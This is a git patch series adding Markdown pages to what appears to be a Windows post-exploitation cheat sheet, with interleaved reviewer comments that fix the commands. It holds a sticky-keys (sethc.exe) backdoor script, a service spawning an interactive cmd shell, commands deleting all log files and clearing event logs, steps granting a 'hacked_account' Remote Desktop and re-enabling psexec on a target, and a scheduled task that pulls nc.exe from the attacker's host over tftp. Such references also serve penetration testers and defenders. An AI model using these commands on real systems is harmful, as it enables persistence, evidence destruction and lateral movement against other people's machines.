From a00120eaf695947d51ac4f7fa53459b13d838686 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 06:31:27 -0500 Subject: [PATCH 1/8] Adding the sub-file links to the index.md --- presence/windows/index.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/presence/windows/index.md b/presence/windows/index.md index d03fe86..e307ab0 100644 --- a/presence/windows/index.md +++ b/presence/windows/index.md @@ -1,8 +1,8 @@ -# Windows CMD Commands +# Windows Presence Commands -Command that can be executed from the context of the CMD.exe prompt. +Command that can be executed from the context of the CMD.exe prompt that help gain insight into the configuration of the target. - * [Config Commands](windows_cmd_config.md) - Commands that display information about the configuration of the victim. - * [Network Commands](windows_cmd_network.md) - Commands used for gathering information about the network settings and connections of a system. - * [Remote Acccess Commands](windows_cmd_remote.md) - Commands to remotely administer systems. + * [Blind Files](blind.md) - Files to look for on the system. + * [Config](windows_cmd_config.md) - Commands that display information about the configuration of the victim. + * [Finding Files](find_files.md) - How to search for files. From 2c2cbd7af2bfb06def145e80af624ca026a75fec Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 06:31:49 -0500 Subject: [PATCH 2/8] Adding the sub-file links to the index.md --- presence/windows/index.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/presence/windows/index.md b/presence/windows/index.md index e307ab0..0743c42 100644 --- a/presence/windows/index.md +++ b/presence/windows/index.md 
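Review bot: the hunk in presence/windows/index.md drops the Network Commands and Remote Access Commands entries, but nothing in this commit deletes or moves windows_cmd_network.md and windows_cmd_remote.md, so those two pages become unreachable from the index; if they are being relocated to another section, do the move in the same commit so the tree never carries orphaned pages. The two new targets, blind.md and find_files.md, are not created anywhere in this series either, so confirm they already exist under presence/windows/ before merging. In the retained intro line, "Command that can be executed from the context of the CMD.exe prompt that help gain insight" should read "Commands that can be executed ... that help gain insight".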
@@ -4,5 +4,4 @@ Command that can be executed from the context of the CMD.exe prompt that help ga * [Blind Files](blind.md) - Files to look for on the system. * [Config](windows_cmd_config.md) - Commands that display information about the configuration of the victim. - * [Finding Files](find_files.md) - How to search for files. - + * [Finding Files](find_files.md) - How to search for files. \ No newline at end of file From 97435c8e8d7a33450dd49d1184b722991e207da0 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 06:37:44 -0500 Subject: [PATCH 3/8] Changing the directory name to the correct spelling --- persistence/windows/autostart.md | 94 ++++++++++++++++++++++++++++++++ persistence/windows/binary.md | 11 ++++ persistence/windows/cover.md | 74 +++++++++++++++++++++++++ persistence/windows/index.md | 4 ++ 4 files changed, 183 insertions(+) create mode 100644 persistence/windows/autostart.md create mode 100644 persistence/windows/binary.md create mode 100644 persistence/windows/cover.md create mode 100755 persistence/windows/index.md diff --git a/persistence/windows/autostart.md b/persistence/windows/autostart.md new file mode 100644 index 0000000..fce7203 --- /dev/null +++ b/persistence/windows/autostart.md 
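Review bot: the only effect of this hunk is to delete the final blank line, and the result has no terminating newline at all (the "\ No newline at end of file" marker); the usual convention is to keep exactly one trailing newline rather than none, and most editors will re-add it and create noise in the next diff. The commit message is identical to patch 1/8 although this change is a whitespace cleanup, so it should say so.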
@@ -0,0 +1,94 @@ +## Windows Autostart Locations +### Folders +| Location | Operating System | +| -------- | ---------------- | +| `%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\` | Windows NT 6.0, 6.1 | +| `%SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\` | Windows 5.0, 5.1, 5.2 | +| `%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\` | Windows 9x | +| `%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\` | Windows NT 3.50, 3.51, 4.0 | +| `User\Startup\` | | +| `%windir%\Start Menu\Programs\Startup\` | | +| `%windir%\Tasks\` | | +| `%windir%\system\iosubsys\` | | +| `%windir%\system\vmm32\` | | + +### Files +| Location | Operating System | +| -------- | ---------------- | +| `%windir%\dosstart.bat` | | +| `%windir%\system.ini` - [boot] "scrnsave.exe" | | +| `%windir%\system.ini` - [boot] "shell" | | +| `%windir%\system\autoexec.nt` | | +| `%windir%\system\config.nt` | | +| `%windir%\win.ini` - [windows] "load" | | +| `%windir%\win.ini` - [windows] "run" | | +| `%windir%\wininit.ini` | | +| `%windir%\winstart.bat` | | +| `c:\autoexec.bat` | | +| `c:\config.sys` | | +| `c:\explorer.exe` | | + +### Registry +| Location | Function | +| -------- | -------- | +| `%windir%\dosstart.bat` | | +| `HKEY_CLASSES_ROOT\batfile\shell\open\command\` | Executed whenever a .BAT file (Batch Command) is run. | +| `HKEY_CLASSES_ROOT\comfile\shell\open\command\` | Executed whenever a .COM file (Command) is run. | +| `HKEY_CLASSES_ROOT\exefile\shell\open\command\` | Executed whenever a .EXE file (Executable) is run. | +| `HKEY_CLASSES_ROOT\jsefile\shell\open\command\` | Executed whenever a .JSE file (Encoded Javascript) is run. | +| `HKEY_CLASSES_ROOT\jsfile\shell\open\command\` | Executed whenever a .JS file (Javascript) is run. | +| `HKEY_CLASSES_ROOT\piffile\shell\open\command\` | Executed whenever a .PIF file (Portable Interchange Format) is run. 
| +| `HKEY_CLASSES_ROOT\scrfile\shell\open\command\` | Executed whenever a .SCR file (Screen Saver) is run. | +| `HKEY_CLASSES_ROOT\vbefile\shell\open\command\` | Executed whenever a .VBE file (Encoded Visual Basic Script) is run. | +| `HKEY_CLASSES_ROOT\vbsfile\shell\open\command\` | Executed whenever a .VBS file (Visual Basic Script) is run. | +| `HKEY_CLASSES_ROOT\wsffile\shell\open\command\` | Executed whenever a .WSF file (Windows Scripting File) is run. | +| `HKEY_CLASSES_ROOT\wshfile\shell\open\command\` | Executed whenever a .WSH file (Windows Scripting Host) is run. | +| `HKEY_CURRENT_USER\Control Panel\Desktop` | The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates. | +| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load` | Executed when the user logs in. | +| `HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run` | Executed when the user logs in. | +| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. | +| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\` | Used only by Setup. Displays a progress dialog box as the keys are run one at a time. | +| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. | +| `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\` | All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit` | Executed when a user logs in. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon` | The "Shell" value is monitored. This value is executed after you log in. 
| +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\` | All values in this key are executed. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\` | Subvalues are executed when Explorer initialises. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | All values in this key are executed, and then their autostart reference is deleted. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\` | All values in this key are executed as services, and then their autostart reference is deleted. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\` | All values in this key are executed as services. | +| `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\` | Executed by explorer.exe as soon as it has loaded. | +| `HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline` | Executed when a 16-bit Windows executable is executed. | +| `HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline` | Executed when a 16-bit DOS application is executed. | +| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` | The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts. | +| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\` | All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey. | +| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\` | Layered Service Providers, executed before user login. | +| `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\` | Services marked to startup automatically are executed before user login. | +| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\` | Similar to the RunOnce key from HKEY_CURRENT_USER. 
| +| `HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\` | Similar to the Run key from HKEY_CURRENT_USER. | + + +## Windows Operating System Versions +From http://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx: + +The following table summarizes the most recent operating system version numbers. + +| Operating system | Version number | +| ---------------- | -------------- | +| Windows 8.1 | 6.3 | +| Windows Server 2012 R2 | 6.3 | +| Windows 8 | 6.2 | +| Windows Server 2012 | 6.2 | +| Windows 7 | 6.1 | +| Windows Server 2008 R2 | 6.1 | +| Windows Server 2008 | 6.0 | +| Windows Vista | 6.0 | +| Windows Server 2003 R2 | 5.2 | +| Windows Server 2003 | 5.2 | +| Windows XP 64-Bit Edition | 5.2 | +| Windows XP | 5.1 | +| Windows 2000 | 5.0 | + +## References +A large portion of this content came from https://web.archive.org/web/20110203184210/http://www.easy-data.no/Autostart.html diff --git a/persistence/windows/binary.md b/persistence/windows/binary.md new file mode 100644 index 0000000..c5a7abd --- /dev/null +++ b/persistence/windows/binary.md 
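Review bot: in the Registry table of persistence/windows/autostart.md the first row, `%windir%\dosstart.bat`, is a file path already listed in the Files table, not a registry location, and should be dropped. In the same table the Winsock LSP path contains a stray space, `Catalog_En tries`, which breaks copy-and-paste into reg.exe or PowerShell; and the two WOW rows use `HKEY_LOCAL_MACHINE\System\Control\WOW\...` while every other HKLM\System entry in the table sits under `System\CurrentControlSet\...`, so check those two paths against the cited source. In the Folders table the 9x entry `%SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\` looks like a garbled directory name, and the ProgramData startup-folder row stops at "Windows NT 6.0, 6.1" although the version table further down lists 6.2 and 6.3. Finally, the commit message says this renames a misspelled directory, but the diff only creates files under persistence/windows/ and deletes nothing; if the misspelled directory is still in the tree it should be removed in this same commit, which would also let git record the change as a rename instead of four new files.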
@@ -0,0 +1,11 @@ +# Windows Binary Planting + +Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges. + +| Command | Description / Importance | +| ------- | ------------------------ | +| `%SystemRoot%\System32\wbem\mof\` | Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vulnerability. | +| `echo $PATH` | Check the $PATH environmental variable. Some directories may be writable. See: https://www.htbridge.com/advisory/HTB23108 | +| `msiexec.exe` | Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. | +| `sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys` | Create malicious services. | +|Replacing file as: sethc.exe
@echo off
c: > nul\\cd\ > nul\\cd %SYSTEMROOT%\System32\ > nul
if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul
cmd %SYSTEMROOT%\System32\cmdsys\ > nul
copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul
copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul
copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul
copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul
exit
| By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. | \ No newline at end of file diff --git a/persistence/windows/cover.md b/persistence/windows/cover.md new file mode 100644 index 0000000..8cb0657 --- /dev/null +++ b/persistence/windows/cover.md @@ -0,0 +1,74 @@ + + + +# Windows Covering Tracks Commands + +Commands to run to clean up a system after you have exploited it and to reduce a target's ability to discover what you did while on their system and are usually executed from the context of the `cmd.exe` or `command.exe` prompt. + +## del +### Delete Logs + * **Command with arguments**: `del %WINDIR%\*.log /a /s /q /f` + * **Description**: **MUST be run as an administrator**. Deletes all *.log files from the %WINDIR% directory. + * **Output**: + * NA + +---- + +## wevtutil +### List Logs + * **Command with arguments**: `wevutil el` + * **Description**: Lists the different log files the system is keeping. More information can be found http://technet.microsoft.com/en-us/library/cc732848(WS.10).aspx + * **Output**: + *
**Windows 2008:** Show/Hide
C:\Users\johndoe>wevtutil el +Application +DFS Replication +Directory Service +DNS Server +File Replication Service +HardwareEvents +Internet Explorer +Key Management Service +Security +System +ThinPrint Diagnostics +EndpointMapper +ForwardedEvents +Microsoft-Windows-ADSI/Debug +Microsoft-Windows-Bits-Client/Analytic +Microsoft-Windows-Bits-Client/Operational +Microsoft-Windows-CAPI2/Operational +Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational +Microsoft-Windows-CodeIntegrity/Operational +Microsoft-Windows-CodeIntegrity/Verbose +Microsoft-Windows-COM/Analytic +Microsoft-Windows-CorruptedFileRecovery-Client/Operational +Microsoft-Windows-CorruptedFileRecovery-Server/Operational +Microsoft-Windows-CredUI/Diagnostic +Microsoft-Windows-DateTimeControlPanel/Analytic +Microsoft-Windows-DateTimeControlPanel/Debug +Microsoft-Windows-DateTimeControlPanel/Operational +Microsoft-Windows-DCLocator/Debug +Microsoft-Windows-Diagnosis-DPS/Analytic +Microsoft-Windows-Diagnosis-DPS/Debug +Microsoft-Windows-Diagnosis-DPS/Operational +Microsoft-Windows-Diagnosis-MSDT/Debug +Microsoft-Windows-Diagnosis-MSDT/Operational +Microsoft-Windows-Diagnosis-PLA/Debug +Microsoft-Windows-Diagnosis-PLA/Operational +Microsoft-Windows-Diagnosis-WDI/Debug +Microsoft-Windows-Diagnostics-Networking/Debug +[...snip...]
+ +### Clear Logs + * **Command with arguments**: `wevtutil cl [LOGNAME]` + * **Description**: **MUST be run as an administrator**. Clears the contents of a specific log. + * **Output**: + *
**Windows 2008:** Show/Hide
c:\temp>wevtutil cl Microsoft-Windows-EventLog/Debug
\ No newline at end of file diff --git a/persistence/windows/index.md b/persistence/windows/index.md new file mode 100755 index 0000000..03274f3 --- /dev/null +++ b/persistence/windows/index.md @@ -0,0 +1,4 @@ +# Windows Persistence Commands + +Commands that help you maintain control over a compromised system. + From 18dbab0cbf8a270bea39df96ee666ab0c6a84459 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 06:40:45 -0500 Subject: [PATCH 4/8] Adding entries for sub-pages --- persistence/windows/index.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/persistence/windows/index.md b/persistence/windows/index.md index 03274f3..d31bcf0 100755 --- a/persistence/windows/index.md +++ b/persistence/windows/index.md @@ -2,3 +2,6 @@ Commands that help you maintain control over a compromised system. + * [Autostart Locations](autostart.md) - Where are the locations that will cause some command to auto-start on boot. + * [Binary Planting](binary.md) - Putting binary files in certain places. + * [Covering Tracks](cover.md) - Covering your tracks. \ No newline at end of file From 7ec6e3ae60d3868992a448ccaae721cf92521a86 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 07:03:39 -0500 Subject: [PATCH 5/8] Adding new general file and the index file. Chmod'd to not be executable --- persistence/windows/general.md | 58 ++++++++++++++++++++++++++++++++++ persistence/windows/index.md | 3 +- 2 files changed, 60 insertions(+), 1 deletion(-) create mode 100644 persistence/windows/general.md mode change 100755 => 100644 persistence/windows/index.md diff --git a/persistence/windows/general.md b/persistence/windows/general.md new file mode 100644 index 0000000..2b35690 --- /dev/null +++ b/persistence/windows/general.md 
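Review bot: in persistence/windows/binary.md the sethc.exe row breaks the table: the batch script is pasted as raw lines inside a table cell, so nothing from "Replacing file as: sethc.exe" onward renders as a table, and the script itself has bugs: `cmd %SYSTEMROOT%\System32\cmdsys\ > nul` is meant to create the cmdsys directory before the copies and should be `md`, since `cmd` starts a nested interactive shell instead; the second line uses `\\` where `&` is needed to chain `c:`, `cd\` and `cd %SYSTEMROOT%\System32`; and `/y` is given twice on every `copy`. Move the script into its own fenced block under the table and leave a one-line entry in the table pointing at it. Elsewhere in the table, `echo $PATH` is Unix shell syntax; from cmd.exe it is `echo %PATH%`. The header says "Command" but the first two rows are a directory path and an executable name, not commands, and the intro sentence "putting binary is a specific place" should read "putting a binary in a specific place".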
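Review bot: in persistence/windows/cover.md the List Logs entry gives the command as `wevutil el` while its own sample output shows `C:\Users\johndoe>wevtutil el`; the executable is `wevtutil`. The intro says commands run from "`cmd.exe` or `command.exe`"; the 16-bit shell is `command.com`. The "Show/Hide" text before each sample output is residue from a collapsible widget and should be removed or turned into a plain label. The del description says it "Deletes all *.log files from the %WINDIR% directory", but with `/s` it also recurses into every subdirectory, which is worth stating on a page about not leaving traces. For the Clear Logs entry, the page should say what the clear operation itself leaves behind in the event logs, since a reader of a covering-tracks page needs to know whether the action is self-logging, and the sample should use a log that matters, such as the Security or System log shown in the `el` output above, rather than Microsoft-Windows-EventLog/Debug.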
@@ -0,0 +1,58 @@ + + + +# Windows General Persistence Commands + +Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the `cmd.exe` or `command.exe` prompt. + + +### Enable `psexec` + * The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below. + + `` c:\> net use \\target\ipc$ username /user:password + c:\> sc \\target config netdde start= auto + c:\> sc \\target config netddedsdm start= auto + c:\> sc \\target config clipsrv start= auto + c:\> sc \\target start netdde + c:\> sc \\target start netddedsdm + c:\> sc \\target start clipsrv + `` + +### Enable Remote Desktop + * Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below. + + 1. Create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system. + +
+     [Unicode]
+         Unicode=yes
+         [Version]
+         signature="$CHICAGO$"
+         Revision=1
+         [Privilege Rights] [Privilege Rights]
+         seremoteinteractivelogonright = hacked_account
+         seinteractivelogonright = hacked_account
+         sedenyinteractivelogonright =
+         sedenyremoteinteractivelogonright =
+         sedenynetworklogonright =
+     
+ + 1. Create another file named `enable_ts.reg` containing the contents below. + +
+     Windows Registry Editor Version 5.00
+     [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+     "fDenyTSConnections"=dword:00000000
+     "TSEnabled"=dword:00000001
+     "TSUserEnabled"=dword:00000000
+     
+ + 1. \ No newline at end of file diff --git a/persistence/windows/index.md b/persistence/windows/index.md old mode 100755 new mode 100644 index d31bcf0..9ef9d53 --- a/persistence/windows/index.md +++ b/persistence/windows/index.md @@ -4,4 +4,5 @@ Commands that help you maintain control over a compromised system. * [Autostart Locations](autostart.md) - Where are the locations that will cause some command to auto-start on boot. * [Binary Planting](binary.md) - Putting binary files in certain places. - * [Covering Tracks](cover.md) - Covering your tracks. \ No newline at end of file + * [Covering Tracks](cover.md) - Covering your tracks. + * [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system. \ No newline at end of file From 44dd8b08ff20aaebb9009e95990b65c791d26ca4 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 07:12:43 -0500 Subject: [PATCH 6/8] Finished adding some content to the remote desktop and psexec sections --- persistence/windows/general.md | 45 ++++++++++++++++++++-------------- 1 file changed, 27 insertions(+), 18 deletions(-) diff --git a/persistence/windows/general.md b/persistence/windows/general.md index 2b35690..802c62b 100644 --- a/persistence/windows/general.md +++ b/persistence/windows/general.md 
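Review bot: in the psexec block of persistence/windows/general.md the `net use` arguments are reversed: `net use \\target\ipc$ username /user:password` passes the username as the password; the syntax is `net use \\target\ipc$ password /user:username` (the Scheduler section added in patch 8/8 of this series uses the correct order). The `[Privilege Rights] [Privilege Rights]` line in fix_ts_policy.ini duplicates the section header and the second copy should be dropped. The command listings are wrapped in double backticks spanning several lines, which Markdown renders as an inline span or not at all; use a fenced code block as the other pages do. The opening sentence "maintain persistence after you have exploited it" has no referent for "it" (the system). The third numbered step is an empty "1."; if the content arrives in a later commit, omit the stub until it does.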
@@ -15,23 +15,23 @@ Commands to run to maintain persistence after you have exploited it and are usua ### Enable `psexec` - * The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below. - - `` c:\> net use \\target\ipc$ username /user:password - c:\> sc \\target config netdde start= auto - c:\> sc \\target config netddedsdm start= auto - c:\> sc \\target config clipsrv start= auto - c:\> sc \\target start netdde - c:\> sc \\target start netddedsdm - c:\> sc \\target start clipsrv - `` +The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below. + +``c:\> net use \\target\ipc$ username /user:password +c:\> sc \\target config netdde start= auto +c:\> sc \\target config netddedsdm start= auto +c:\> sc \\target config clipsrv start= auto +c:\> sc \\target start netdde +c:\> sc \\target start netddedsdm +c:\> sc \\target start clipsrv +`` ### Enable Remote Desktop - * Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. 
According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below. +Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below. - 1. Create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system. + 1. On the compromised system, create a file named `fix_ts_policy.ini` containing the contents below. Change the *"hacked_account"* value to the account you have compromised on the remote system. -
+    
      [Unicode]
          Unicode=yes
          [Version]
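Review bot: the reformat keeps the reversed `net use \\target\ipc$ username /user:password` (password and username are swapped; the order is `password /user:username`) and only strips the list bullet and indentation, so the bug survives the rewrite. The double-backtick wrapper spanning seven command lines is still not a code block in Markdown; a fenced block would render the commands as written. Step 1 now opens with "On the compromised system, create a file" while the same sentence still says "the account you have compromised on the remote system"; pick one of "compromised" and "remote" for the target machine and use it consistently.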
@@ -43,16 +43,25 @@ Commands to run to maintain persistence after you have exploited it and are usua
          sedenyinteractivelogonright =
          sedenyremoteinteractivelogonright =
          sedenynetworklogonright =
-     
+
- 1. Create another file named `enable_ts.reg` containing the contents below. + 1. Create another file named `enable_ts.reg` containing the contents below. -
+    
      Windows Registry Editor Version 5.00
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
      "fDenyTSConnections"=dword:00000000
      "TSEnabled"=dword:00000001
      "TSUserEnabled"=dword:00000000
-     
+
- 1. \ No newline at end of file + 1. On the remote system, execute the following commands: + + ``c:\> sc config termservice start= auto sc config termservice start= auto +c:\> regedit /s enable_ts.reg +c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb +c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb +c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini +c:\> gpupdate /Force +c:\> net start "terminal services" +`` \ No newline at end of file From 85e83e9a0220c17309d99e28228280a611fcd783 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 10:40:11 -0500 Subject: [PATCH 7/8] Adding the index.md file so you can access the sub pages --- pivoting/windows/index.md | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100755 pivoting/windows/index.md diff --git a/pivoting/windows/index.md b/pivoting/windows/index.md new file mode 100755 index 0000000..1d08d04 --- /dev/null +++ b/pivoting/windows/index.md @@ -0,0 +1,6 @@ +# Windows Pivoting Commands + +Commands that help you pivot to other systems from a compromised system. + + * [Networking Commands](windows_cmd_network.md) - Gathering system information about network interfaces and such. + * [Remote Movement](remote.md) - Commands that move data and files between systems on a network. \ No newline at end of file From df440da00d6bcd2dfd79e255f932603aa3085f02 Mon Sep 17 00:00:00 2001 From: webbreacher Date: Sun, 29 Dec 2013 10:43:53 -0500 Subject: [PATCH 8/8] Adding more content. --- persistence/windows/general.md | 25 +++++++++++++++++-------- 1 file changed, 17 insertions(+), 8 deletions(-) diff --git a/persistence/windows/general.md b/persistence/windows/general.md index 802c62b..5717985 100644 --- a/persistence/windows/general.md +++ b/persistence/windows/general.md 
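Review bot: in the new step 3 block the first command line is duplicated on itself: `sc config termservice start= auto sc config termservice start= auto` would hand the second copy to sc as extra arguments and fail; it should be a single `sc config termservice start= auto`. The `secedit /configure /db new.secedit.sdb` call uses a bare filename although the preceding copies wrote the database to `c:\windows\security\database\new.secedit.sdb`; give secedit the same full path, otherwise it operates on a file relative to the current directory. `gpupdate /Force` will reapply any domain policy that governs logon rights or fDenyTSConnections, which can undo the local change just made; the page should note that caveat since it is about keeping access. The `orig.secedit.sdb` copy is a backup and should be labelled as such so the reader knows to restore it when cleaning up. The double-backtick wrapper is still used instead of a fenced block.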
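Review bot: pivoting/windows/index.md links to `windows_cmd_network.md` and `remote.md` relative to pivoting/windows/, but neither file is created in this series and patch 1/8 references windows_cmd_network.md from presence/windows/ instead, so at least one of the two links dangles; either move the file here in the same commit or link to its real location. The page is created with mode 100755 although patch 5/8 changed persistence/windows/index.md to 100644 precisely because a Markdown page should not be executable; create this one as 100644 too. The file also ends without a trailing newline.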
@@ -17,13 +17,13 @@ Commands to run to maintain persistence after you have exploited it and are usua ### Enable `psexec` The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below. -``c:\> net use \\target\ipc$ username /user:password -c:\> sc \\target config netdde start= auto -c:\> sc \\target config netddedsdm start= auto -c:\> sc \\target config clipsrv start= auto -c:\> sc \\target start netdde -c:\> sc \\target start netddedsdm -c:\> sc \\target start clipsrv +``c:\> net use \\[TargetIP]\ipc$ username /user:password +c:\> sc \\[TargetIP] config netdde start= auto +c:\> sc \\[TargetIP] config netddedsdm start= auto +c:\> sc \\[TargetIP] config clipsrv start= auto +c:\> sc \\[TargetIP] start netdde +c:\> sc \\[TargetIP] start netddedsdm +c:\> sc \\[TargetIP] start clipsrv `` ### Enable Remote Desktop 
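Review bot: substituting `[TargetIP]` for `target` still leaves `net use \\[TargetIP]\ipc$ username /user:password` with username and password swapped, while the Scheduler hunk below in the same patch writes `password /user:username`; make the psexec block match. The double-backtick wrapper also remains, so this block still does not render as code.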
@@ -64,4 +64,13 @@ c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\ c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini c:\> gpupdate /Force c:\> net start "terminal services" -`` \ No newline at end of file +`` + +### Scheduler +The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below. + +``c:\> net use \\[TargetIP]\ipc$ password /user:username +c:\> at \\[TargetIP] 12:00 pm command +`` + +An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe` \ No newline at end of file
